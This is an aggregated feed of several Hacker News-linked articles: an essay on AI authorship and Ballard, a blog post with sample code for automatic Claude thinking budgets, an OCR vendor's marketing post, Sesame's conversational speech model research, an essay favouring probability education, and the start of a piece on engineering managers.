    Similar to OpenAI’s ChatGPT, Jasper Chat is a brand-spanking-new conversational chatbot.
    Similar to OpenAI’s ChatGPT, Jasper Chat is a brand-spanking-new conversational chatbot.

    Is that what’s happening to us, too?

    In the end, we came to the conclusion that Ballard's genius anticipated a question that concerns us all today: When we use an AI to generate text and images (or whatever), who is the real author? Is it true writing? Are they really novels? Is it really poetry? Is it literature at all?
    In Ballard's story, the writers have forgotten what it means to write on their own. They no longer know what it means to develop ideas, they just plug them into a machine and let it do the writing. Is that what’s happening to us, too? I believe that AI can be a valuable help and even partly replace humans in their creative role. But I also believe that an AI could not have written this Ballard's story, with the same inventive and perfection. I do believe that there is a distance between “skill” and “mastery” that no AI can ever bridge.
    At least, I hope I'm right.

    More Ballard's Short Stories

    • “Manhole 69” (1957)
    • “Chronopolis” (1960)
    • “The Voices of Time” (1960)
    • “The Overloaded Man” (1961)
    • “Billennium” (1961)
    • “Thirteen to Centaurus” (1962)
    • “The Subliminal Man” (1963)
    • “End-Game” (1963)
    • “Time of Passage” (1964)
    • “The Lost Leonardo” (1964)
    • “The Terminal Beach” (1964)
    • “The Drowned Giant” (1964)
    • “The Beach Murders” (1966)
    • XIV.  “The Assassination of John Fitzgerald Kennedy Considered as a Downhill Motor Race” (1966)
    • “Why I Want to Fuck Ronald Reagan” (1968)
    • “Notes Towards a Mental Breakdown” (1976)
    • “The Index” (1977)
    • “The Dead Time” (1977)
    • “News from the Sun” (1981)
    • “Myths of the Near Future” (1982)
    • “Memories of the Space Age” (1982)
    • “Answers to a Questionnaire” (1985)
    • “A Guide to Virtual Death” (1992)

    More Insights

    • Miracles of Life: Shanghai to Shepperton: An Autobiography (2008) - James Ballard's autobiography, detailing his childhood in Shanghai, experiences during World War II, and his writing career.
    • Running Wild (1988) - A collection of interviews, essays, and reviews that provide insights into Ballard's views on literature, society, and culture.
    • A User's Guide to the Millennium: Essays and Reviews (1996) - A collection of Ballard's essays and book reviews on various topics, including literature, art, and contemporary issues.
    • Extreme Metaphors: Selected Interviews with J.G. Ballard (2012) - A comprehensive collection of interviews spanning Ballard's career, offering insights into his ideas and creative process.

    Verse Transcriber-related news articles [here]:
     - 200,000 Computer-Generated Books
     - Computer 'Aesop' Writes Fables With A Moral
     - Scheherazade, An Open Story Generator
     - The Next (Computer) Rembrandt
     - Xiaoice AI Now A Poet
     - Shelley.ai AI Terrifies Thanks To Reddit's Nosleep
     - Deepfakes From OpenAI GPT-2 Algorithm

    ]]>
    https://aroundscifi.us/en/studio-5-the-stars-ballards-1961-short-that-already-told-the-story-of-text-generating-ais/ hacker-news-small-sites-43201012 Fri, 28 Feb 2025 02:25:21 GMT
    <![CDATA[Think Toggles Are Dumb]]> thread link) | @NiloCK
    February 27, 2025 | https://www.paritybits.me/think-toggles-are-dumb/ | archive.org

    Claude 3.7 was released a few days ago. Its code output is yet another impressive jump up from the already excellent Claude 3.5 and 3.5 (new) aka 3.5.1 aka 3.6.

    Another major addition is the Extended mode, where Claude does a Chain-of-Thought style deliberation before providing a final response to the query. It's accessible via the web interface for the mere cost of two clicks per interaction:

    select-mouse

    (Or five keystrokes, if you're that way inclined - tab down down down enter)

    In real life, I do more explicit prompting for humans to actively think than average. I was a teacher, and I currently have two young kids. But for most people, in most situations, this is a very unnatural thing to think about.

    If I ask a Spaniard what the capital of Spain is I would expect, and be happy with, an off-the-cuff response. If I ask the same Spaniard for a summary of treatment options for a rare disease, and also gave them a bunch of diagnostic materials and family history, I would expect a more deliberated response.

    Importantly: I wouldn't have to tell him the difference.

    All this to say: a manual think toggle betrays some stupidity in the overall mechanism. It also severely dampens the ability for conversations to naturally wander between periods of lighter and deeper substance.

    A more natural way to interact is for the assistant, like a person, to exercise some judgement about how much effort to put into a given response.

    The basic structure is simple:

    • The user asks a question / provides some prompt.
    • The model assigns a complexity score to it.
    • Below a certain threshold, the model responds immediately.
    • Above the threshold, the model allocates a thinking budged proportional to the complexity score, and then responds.

    It's so simple that Claude 3.7 (almost) produced a PoC from one prompt. I rounded some edges and the PoC is now live at http://nilock.github.io/autothink. This is a Bring-your-own-API-Key affair, and the browser communicates directly with the Anthropic API.

    Note below that the simple query provides no option to examine the thinking tokens, because there are none. Thinking is conditioned on the user inputs. The progress bars embedded in Claude's responses give the perceived complexity of the prompts, rated from 0-100 (complexity 10 is the thinking threshold).

    AutoThink UI AutoThink - Hard

    The mechanics here are as simple as the bullet points above. We pre-fire the user query for the complexity estimate:

    const response = await anthropic.messages.create({
      model: "claude-3-7-sonnet-20250219",
      max_tokens: 50,
      system:
        "You are an AI assistant that analyzes query complexity and returns ONLY a number from 0-100.",
      messages: [
        // [ ] todo: incorporate the entire conversation context.
        {
          role: "user",
          content: `
    Please analyze the following user query and rate its
    complexity on a scale from 0-100, where 0 means a simple,
    straightforward question requiring minimal reasoning, and 100
    means an extremely complex problem requiring intensive
    step-by-step analysis. Provide ONLY a number between 0-100
    with no explanation.
    
    User query: "${query}"`,
        },
      ],
    });
    const score = parseInt(response.content[0].text.trim(), 10);
    

    I used 3.7-sonnet as the analyst, which is probably overkill. I expect that 3.7-haiku would give good-enough results for the purpose.

    Once we get a complexity score, we run it through a helper to scale the thinking token budget:

    const calculateThinkingBudget = (complexityScore) => {
      // Minimum thinking budget is 1024 tokens
      if (complexityScore < 10) return 0; // No extended thinking for simple queries
    
      // Scale from minimum (1024) to maximum (32000) based on complexity
      const minBudget = 1024;
      const maxBudget = 32000;
      return Math.round(
        minBudget + (maxBudget - minBudget) * (complexityScore / 100),
      );
    };
    

    and finally resend the original query with the allocated thinking budget:

    await anthropic.messages.create({
      model: "claude-3-7-sonnet-20250219",
      max_tokens: budget + 4000, // 4000 here for the actual response
      system: "You are Claude, a helpful AI assistant.",
      messages: newMessages.map((msg) => ({
        role: msg.role,
        content: msg.content,
      })),
      thinking:
        budget > 0
          ? {
              type: "enabled",
              budget_tokens: budget,
            }
          : {
              type: "disabled",
            },
    });
    

    In practice, the thinking threshold and budgeting would be adjusted for cost / benefit, and according to load, etc. But there you go - a Claude that automatically thinks when it expects it might help, and answers off the cuff where appropriate, automatically, in about a dozen lines of functional code.

    Developers love knobs, and frontier AI research labs seem like developer heavy organizations. But consumer tools can't have a lot of knobs.

    The extended toggle presents people with two options:

    1. forget that it exists
    2. think about it every time they interact with the product

    But both are bad! The first because it's hard to do long-term, and whenever you are reminded, you suffer the FOMO of having misused a powerful tool. The second because it's just a pain in the butt and an overall quality-of-life reduction.

    From 3.0 onward, part of Claude's stickiness advantage has been how consistently pleasant it's been to interact with. The knobby-ness of the UI chips away at that advantage.

    ]]>
    https://www.paritybits.me/think-toggles-are-dumb/ hacker-news-small-sites-43201008 Fri, 28 Feb 2025 02:24:40 GMT
    <![CDATA[Putting Andrew Ng's OCR models to the test]]> thread link) | @ritvikpandey21
    February 27, 2025 | https://www.runpulse.com/blog/putting-andrew-ngs-ocr-models-to-the-test | archive.org

    February 27, 2025

    3 min read

    Putting Andrew Ng’s OCR Models to The Test

    Today, Andrew Ng, one of the legends of the AI world, released a new document extraction service that went viral on X (link here). At Pulse, we put the models to the test with complex financial statements and nested tables – the results were underwhelming to say the least, and suffer from many of the same issues we see when simply dumping documents into GPT or Claude.

    Our engineering team, along with many X users, discovered alarming issues when testing complex financial statements:

    • Over 50% hallucinated values in complex financial tables
    • Missing negative signs and currency markers
    • Completely fabricated numbers in several instances
    • 30+ second processing times per document

    Ground Truth

    Andrew Ng OCR Output

    Pulse Output

    When financial decisions worth millions depend on accurate extraction, these errors aren't just inconvenient – they're potentially catastrophic.

    Let’s run through some quick math: in a typical enterprise scenario with 1,000 pages containing 200 elements per page (usually repeated over tens of thousands of documents), even 99% accuracy still means 2,000 incorrect entries. That's 2,000 potential failure points that can completely compromise a data pipeline. Our customers have consistently told us they need over 99.9% accuracy for mission-critical operations. With probabilistic LLM models, each extraction introduces a new chance for error, and these probabilities compound across thousands of documents, making the failure rate unacceptably high for real-world applications where precision is non-negotiable.

    As we've detailed in our previous viral blog post, using LLMs alone for document extraction creates fundamental problems. Their nondeterministic nature means you'll get different results on each run. Their low spatial awareness makes them unsuitable for complex layouts in PDFs and slides. And their processing speed presents serious bottlenecks for large-scale document processing.

    At Pulse, we've taken a different approach that delivers:

    • Accurate extraction with probability of errors slowly approaching 0
    • Complete table, chart and graph data preservation
    • Low-latency processing time per document

    Our solution combines proprietary table transformer models built from the ground up with traditional computer vision algorithms. We use LLMs only for specific, controlled tasks where they excel – not as the entire extraction pipeline. 

    If your organization processes financial, legal, or healthcare documents at scale and needs complete reliability (or really any industry where accuracy is non-negotiable), we'd love to show you how Pulse can transform your workflow.

    Book a demo here to see the difference for yourself.

    ]]>
    https://www.runpulse.com/blog/putting-andrew-ngs-ocr-models-to-the-test hacker-news-small-sites-43201001 Fri, 28 Feb 2025 02:24:04 GMT
    <![CDATA[Crossing the uncanny valley of conversational voice]]> thread link) | @nelwr
    February 27, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice#demo | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

    To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a

    single-stage model, thereby improving efficiency and expressivity. The second is our

    evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

    A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second-stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation; semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.

    Compute amortization

    This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden even with a small model slows down training, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

    Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 31 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

    Pronunciation correction sentence is a recording, all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice#demo hacker-news-small-sites-43200400 Fri, 28 Feb 2025 00:55:00 GMT
    <![CDATA[Standup Comedy by Claude]]> thread link) | @FergusArgyll
    February 27, 2025 | https://gally.net/temp/20250225claudestandup2.html | archive.org

    Unable to retrieve article]]>
    https://gally.net/temp/20250225claudestandup2.html hacker-news-small-sites-43200246 Fri, 28 Feb 2025 00:27:33 GMT
    <![CDATA[Show HN: Upplai – AI Feedback on Resumes and Cover Letters]]> thread link) | @soubhik
    February 27, 2025 | https://you.uppl.ai/login?invitation=ycombinator | archive.org

    Unable to retrieve article]]>
    https://you.uppl.ai/login?invitation=ycombinator hacker-news-small-sites-43200190 Fri, 28 Feb 2025 00:21:21 GMT
    <![CDATA[Tesla Powerwall 3 Alternatives]]> thread link) | @Vsolar
    February 27, 2025 | https://www.virtuesolar.com/2025/02/17/tesla-powerwall-3-alternatives/ | archive.org

    Unable to retrieve article]]>
    https://www.virtuesolar.com/2025/02/17/tesla-powerwall-3-alternatives/ hacker-news-small-sites-43200179 Fri, 28 Feb 2025 00:20:29 GMT
    <![CDATA[Math That Matters: The Case for Probability over Polynomials]]> thread link) | @herbertl
    February 27, 2025 | https://anandsanwal.me/math-eduction-more-probability-statistics-less-calculus/ | archive.org

    probability over calculus - math that matters

    This essay first appeared in my newsletter. Sign up here if interested in F’ing up the status quo and fixing education.


    When I was in high school, students divided into two camps: those who “got” math and those who believed they simply weren’t “math people.” 

    I was one of the “got” math people who spent countless hours doing trigonometry and eventually doing AP Calculus where I was doing derivatives and all sorts of ‘fancy’ math. Deep down, I knew what this was really about – it wasn’t about practical skills but about signaling I was smart, just like the other high-achiever types. It wasn’t about learning. It was just another credential for the college application rat race.

    Meanwhile, some of my friends struggled with math not because they lacked ability, but because the content was so disconnected from anything they cared about. When any of us asked the teacher when we’d ever use this stuff, she gave the standard response about college preparation and developing abstract thinking skills. 

    But looking back now, I realize we were all learning the wrong math – both the students who excelled and those who gave up. It is yet another example of how schools fail teenagers.

    The math most useful in real life isn’t calculus or advanced trigonometry – it’s probability and statistics. And yet our education system treats these subjects as afterthoughts, typically confined to a single elective course typically in senior year, if taught at all. 

    This is backwards.

    Consider what probability and statistics let you do: 

    • understand risk in everyday decisions
    • detect misleading claims in news articles
    • make smarter choices about money; and
    • grasp uncertainty in everything from weather forecasts to medical tests

    A teenager who understands basic probability can immediately see through the false promises of gambling apps targeting their age group. One who grasps statistical significance can better interpret health studies they encounter about supplements making grand promises about physical health. 

    These aren’t “someday you might need this” skills – they’re immediately useful.

    The evidence and arguments for emphasizing probability and statistics is compelling:

    • Daniel Kahneman’s Nobel Prize-winning research reveals how humans systematically misjudge probabilities in predictable ways. His work with Amos Tversky shows that even simple statistical concepts like base rates and regression to the mean are counterintuitive to most people, leading to poor decisions in everything from medical diagnoses to financial investments. Teaching probability early could help students avoid these cognitive traps.
    • Jordan Ellenberg, in “How Not to Be Wrong,” demonstrates through dozens of examples how statistical thinking illuminates everything from lottery scams to political gerrymandering. He argues that the mathematics most useful for citizenship and everyday life isn’t calculus but the ability to reason about uncertainty and variation – skills that probability and statistics directly develop.
    • Bryan Caplan explicitly argues in “The Case Against Education” that our math curriculum teaches skills with little real-world application for most students. He points out the mismatch between the predominantly algebraic-calculus track and the actual mathematical needs of most careers and life situations, which more often involve understanding data, risk, and basic statistical concepts.
    • Arthur Benjamin, in his famous TED talk and subsequent writings, makes the case that statistics should replace calculus as the “summit” of high school mathematics. He argues that for most students, statistical literacy is far more valuable than calculus in a world increasingly driven by data and probability, yet our curriculum treats statistics as optional while pushing students toward calculus.
    • Andrew Gelman, one of today’s leading statisticians, has written extensively about restructuring mathematical education around understanding uncertainty rather than abstract proofs. He advocates for teaching statistics through simulation and real problems, suggesting that even complex statistical concepts can be made intuitive when presented in contexts that matter to students.

    To make room for more probability and statistics, we need to be willing to cut something. I’ve previously argued against Shakespeare and other subjects here.

    But if we’re focused on what to downshift on within math, the obvious candidates are topics like advanced trigonometry, detailed polynomial factoring, and calculus for non-STEM students. 

    These are precisely the topics that prompt eye rolls and “when will we use this?” questions from students – because they’re right. Most won’t use these skills unless they pursue specific technical careers.

    But teaching probability and statistics well requires more than just changing the curriculum – it requires making it engaging. Instead of abstract problems about pulling colored balls from urns, we should use real-world applications that matter to students:

    • Sports Analytics: Students could analyze their fantasy sports team performance using probability distributions, calculate the true value of different player stats, or determine whether a winning streak is skill or random chance. A basketball fan might learn expected value by calculating whether a player should shoot a 3-pointer or drive for a 2 based on their shooting percentages – mathematics that suddenly matters when applied to their favorite team.
    • Social Media Content Creation: For aspiring YouTubers or TikTok creators, statistical thinking offers immediate value. Students could analyze video performance data to determine what factors correlate with higher engagement, use A/B testing to compare different title formats, or apply probability to predict which content categories have the best chance of going viral based on platform algorithm patterns.
    • Gaming Strategy: Video games provide a perfect laboratory for probability concepts. Students could calculate drop rates for rare items, optimize resource allocation in strategy games, or analyze win rates with different character builds. The mathematics of expected value directly translates to better gaming decisions, creating an immediate connection between abstract concepts and personal interests.
    • Music and Streaming Analytics: Students could examine the probability distributions of streams across different artists, analyze what makes songs trend on platforms like Spotify, or calculate the expected payout from streaming versus other revenue sources – connecting statistical thinking to their passion for music.
    • Understanding Social Dynamics: Probability helps make sense of social phenomena students experience daily. What are the chances of two people in their class sharing a birthday? How can they understand selection bias in social circles? Why do certain rumors spread faster than others? These questions make statistical concepts relevant to their immediate social world.
    • Consumer Decision-Making: Students regularly make purchasing decisions. Statistical literacy helps them analyze whether a sale is actually a good deal, understand the risk/reward of extended warranties, or calculate the expected lifetime cost of different electronics – skills they can apply immediately at the mall or online.

    When students see immediate and useful applications, the dreaded “when will we use this?” question disappears.

    The benefits of this shift would be profound. We’d graduate students better equipped to:

    • Make informed personal decisions about money, health, and risk
    • Understand scientific claims and evaluate evidence
    • Navigate an increasingly data-driven world
    • Think probabilistically about complex problems
    • Detect misleading statistics and flawed studies

    I will digress and offer one more slightly detailed and pressing reason to prioritize probability education: the explosion of sports betting among young people, particularly young men. 

    As states legalize gambling and betting apps target younger audiences, many students will encounter these platforms and never truly understand the mathematics behind them. A strong foundation in probability & mathematical reasoning would help them see through the carefully crafted illusion of easy money, understand concepts like house edge and expected value, and recognize how betting odds are strategically designed to favor the house.

    Rather than simply telling students to avoid sports gambling (a strategy with limited effectiveness akin to abstinence-only sex education), we could equip them with the mathematical tools to understand why the vast majority of bettors lose money over time. This is mathematics as a form of protection against predatory industries and companies.

    Even for STEM-bound students, stronger foundations in probability and statistics would be valuable. Many cutting-edge fields like AI, genomics, and climate science rely heavily on statistical methods. A student heading into computer science is more likely to need knowledge of probabilistic algorithms than advanced calculus.

    Some will object that reducing traditional mathematics could harm students’ abstract reasoning abilities. But probability and statistics develop these same skills while being more practical. TBH, “abstract reasoning” is often the catch-all reason given when teachers can’t really answer a student’s “when will I use this?” question. It’s a thoughtful sounding way of saying “Because, I told you so”. Understanding confidence intervals requires just as much abstract thinking as understanding the quadratic formula – but one has far more real-world applications than the other.

    Here’s what a reformed curriculum might look like:

    • Middle School: Basic probability concepts, data literacy, and simple statistical measures
    • 9th Grade: Core algebra with probability applications
    • 10th Grade: Geometry with data visualization and spatial statistics
    • 11th Grade: Advanced algebra with statistical inference and modeling
    • 12th Grade: Advanced statistics and data analysis (with calculus as an optional track for STEM-focused students)

    This isn’t about making math easier or less rigorous – it’s about making it more relevant. 

    The mathematical challenges of understanding probability and working with statistics are just as rigorous as traditional topics. The difference is that students can see why these challenges matter.

    The world is becoming more complex and data-driven. The ability to think probabilistically and understand statistics isn’t just useful – it’s becoming essential. We owe it to our students to teach them the mathematical tools and associated reasoning they’ll actually need to navigate this world. The sooner we make this shift, the better equipped the next generation will be to face the challenges ahead.

    Some of the brightest minds in mathematics education – from Kahneman to Gelman – have been pointing us in this direction. It’s time we listened.

    The real opportunity here isn’t just better preparing students for some abstract future. It’s about making mathematics immediately relevant to their lives today. When students analyze the statistics of their favorite games, calculate the real odds of social phenomena they care about, or use probability to understand the news they consume, math transforms from a chore into a powerful lens for seeing their world more clearly.

    A shift toward probability and statistics could make math more democratic too. Traditional math curricula often function as sorting mechanisms, separating “math people” from everyone else. Statistical thinking, with its blend of quantitative skills and real-world contexts, can be more approachable and engaging for a broader range of students. Done right, it could help more students discover that they are “math people” after all.

    Building an education system around what’s relevant now, rather than around outdated notions of what might be useful someday, isn’t lowering our standards. It’s raising them by demanding that what we teach actually matters. The cost of continuing to teach the wrong math isn’t just wasted time—it’s a missed opportunity to give students tools they could be using every day.

    ]]>
    https://anandsanwal.me/math-eduction-more-probability-statistics-less-calculus/ hacker-news-small-sites-43199732 Thu, 27 Feb 2025 23:24:44 GMT
    <![CDATA[Who's Better for Engineering Teams – Technical or Non-Technical Managers?]]> thread link) | @execubot0x1
    February 27, 2025 | https://execefficiency.ai/en/blog/execubot-whos-better-for-engineering-teams-technical-or-non-technical-managers | archive.org

    The Two Types of Engineering Team Managers

    Engineering team managers can either have a technical background or a management background. A manager can work great for an engineering team regardless of their experience. Both types have advantages and disadvantages. The right manager can overcome these disadvantages.

    Fiery debates flood the tech world (and their forums and meeting rooms) about whether a technical background determines a manager's success. Regardless of technical experience, a great manager acknowledges their shortcomings to unite their team.

    The Technical Manager

    Technical managers lead their teams with field experience and knowledge. They've worked on engineering teams before and know the ins-and-outs of technical processes. These managers have a built-in credibility with their engineers because of mutual credentials.

    They may be staying up-to-date with technical advancements to be on-par with the engineers they lead. Technical managers share technical language with engineers, making for easy communication on project specifics. They understand realistic time frames around technical/coding deadlines. They've likely progressed into management due to a strong foundation in technical experience. Technical managers may have been former lead developers or senior software engineers.

    Advantages of a Technical Manager

    A technical manager may be preferred by engineering teams. A common ground of technical experience gives a technical manager authority on tech projects.

    • Common language: A technical manager understands the language and complexities of tech. A shared language between manager and team can create efficiency.
    • Technical decision-making: Technical managers are typically previous senior engineers and thus able to guide decisions in technical projects. Their extensive experience and up-to-date technical knowledge allows for strategy for success.

    Cons of a Technical Manager

    • Outdated experience: Some technical managers choose to be up-to-date on the latest technical knowledge, but no amount of studying can give them the same boost as fresh out-of-school engineers. Managers have to spend most of their time managing their teams and projects, so their technical knowledge may fall behind current trends.
    • Leadership lack: Technical managers have spent more time in tech than management, so their leadership skills may need refinement. Their technical contributions may be strong but will not translate to managing people and navigating workplace politics.

    The Non-Technical Manager

    A non-technical manager has limited or no technical experience. They may have basic tech knowledge such as required technical coding rounds. However, they were never part of software teams long-term and instead have experience as project managers or administrators in different fields.

